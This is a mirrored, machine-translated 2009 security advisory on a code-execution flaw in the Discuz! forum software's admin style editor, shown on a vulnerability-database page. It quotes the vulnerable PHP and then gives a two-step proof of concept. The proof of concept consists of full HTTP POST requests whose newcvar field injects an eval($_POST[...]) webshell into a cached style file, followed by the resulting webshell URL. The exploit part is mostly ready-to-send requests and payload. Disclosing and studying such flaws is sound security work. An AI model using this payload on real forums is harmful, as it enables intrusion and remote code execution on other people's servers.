Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62200923926
HistoryJul 17, 2009 - 12:00 a.m.

Discuz! admin\styles.inc.php get-webshell bu-vulnerability warning-the black bar safety net

2009-07-1700:00:00
佚名
www.myhack58.com
20
JSON

author: ring04h
team:http://www. 80vul. com

Due to Discuz! Admin\styles. inc. php in preg_match regular judging$newcvar the variable operation is not precise enough, leading to code execution vulnerability.

An analysis

In file admin\styles. inc. php in the code:
if($newcvar && $newcsubst) {
if($db->result_first(“SELECT COUNT() FROM {$tablepre}stylevars WHERE variable=‘$newcvar’ AND styleid=‘$id’")) {
cpmsg(‘styles_edit_variable_duplicate’, “, ‘error’);
} elseif(! preg_match(”/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]/”, $newcvar)) {
cpmsg(‘styles_edit_variable_illegal’, ", ‘error’);
}
$newcvar = via strtolower($newcvar);
$db->query(“INSERT INTO {$tablepre}stylevars (styleid, variable, substitute)
VALUES (‘$id’, ‘$newcvar’, ‘$newcsubst’)”);
}

The above code can be seen when there is background permissions,by editing the style,a custom template variable is inserted at the<strong> !‘,’ 80VUL’);EVAL($_POST[RING]);// </strong> replace the Insert exp by ring04h!, the Remote write the webshell code execution.

II use

POC:

step1:

POST /bbs/admincp. php? action=styles HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd. ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, application/x-shockwave-flash, /
Referer: <http://www.80vul.com/bbs/admincp.php?action=styles&gt;
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; . NET CLR 2.0.50727; . NET CLR 3.5.30729; . NET CLR 3.0.30618)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.80vul.com
Content-Length: 1 5 4
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:

formhash=99238f2d&anchor=&updatecsscache=0&namenew%5B1%5D=%C4%AC%C8%CF%B7%E7%B8%F1&availablenew%5B1%5D=1&defaultnew=1&newname=exp&stylesubmit=%CC%E1%BD%BB

step2:

POST /bbs/admincp. php? action=styles&operation=edit&id=6 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd. ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, application/x-shockwave-flash, /
Referer: http://www.80vul.com/bbs/admincp.php?action=styles&operation=edit&id=6
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; . NET CLR 2.0.50727; . NET CLR 3.5.30729; . NET CLR 3.0.30618)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.80vul.com
Content-Length: 1 4 0 2
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:

formhash=99238f2d&anchor=&namenew=exp&templateidnew=1&stylevar%5B249%5D=1&stylevar%5B247%5D=&stylevar%5B248%5D=&stylevar%5B246%5D=&stylevar%5B250%5D=&stylevarbgimg%5B250%5D=&stylevarbgextra%5B250%5D=&stylevar%5B251%5D=&stylevarbgimg%5B251%5D=&stylevarbgextra%5B251%5D=&stylevar%5B252% 5D=&stylevarbgimg%5B252%5D=&stylevarbgextra%5B252%5D=&stylevar%5B253%5D=&stylevar%5B254%5D=&stylevar%5B255%5D=&stylevar%5B256%5D=&stylevar%5B257%5D=&stylevar%5B258%5D=&stylevar%5B259%5D=&stylevar%5B260%5D=&stylevar%5B261%5D=&stylevar%5B262%5D=&stylevar%5B263% 5D=&stylevar%5B264%5D=&stylevar%5B265%5D=&stylevar%5B266%5D=&stylevar%5B267%5D=&stylevar%5B268%5D=&stylevar%5B269%5D=&stylevar%5B270%5D=&stylevar%5B271%5D=&stylevar%5B272%5D=&stylevar%5B273%5D=&stylevar%5B274%5D=&stylevar%5B275%5D=&stylevarbgimg%5B275% 5D=&stylevarbgextra%5B275%5D=&stylevar%5B276%5D=&stylevar%5B277%5D=&stylevar%5B278%5D=&stylevar%5B279%5D=&stylevar%5B280%5D=&stylevar%5B281%5D=&stylevar%5B282%5D=&stylevar%5B283%5D=&stylevarbgimg%5B283%5D=&stylevarbgextra%5B283%5D=&stylevar%5B284%5D=&stylevarbgimg%5B284% 5D=&stylevarbgextra%5B284%5D=&stylevar%5B285%5D=&stylevarbgimg%5B285%5D=&stylevarbgextra%5B285%5D=&stylevar%5B286%5D=&stylevar%5B287%5D=&stylevar%5B288%5D=&stylevar%5B289%5D=&stylevar%5B290%5D=&stylevar%5B291%5D=&newcvar=%2 1% 2 7%2C%2780vul%2 7% 2 9%3Beval%2 8%24_post%5Bring%5D%2 9%3B%2F%2F&newcsubst=exp+by+ring04h%2 1&editsubmit=%CC% E1%BD%BB

webshell:

<http://www.80vul.com/bbs/forumdata/cache/style_6.php&gt;

Three patch[fix]

The vulnerability has been submitted, wait for the official patch.

JSON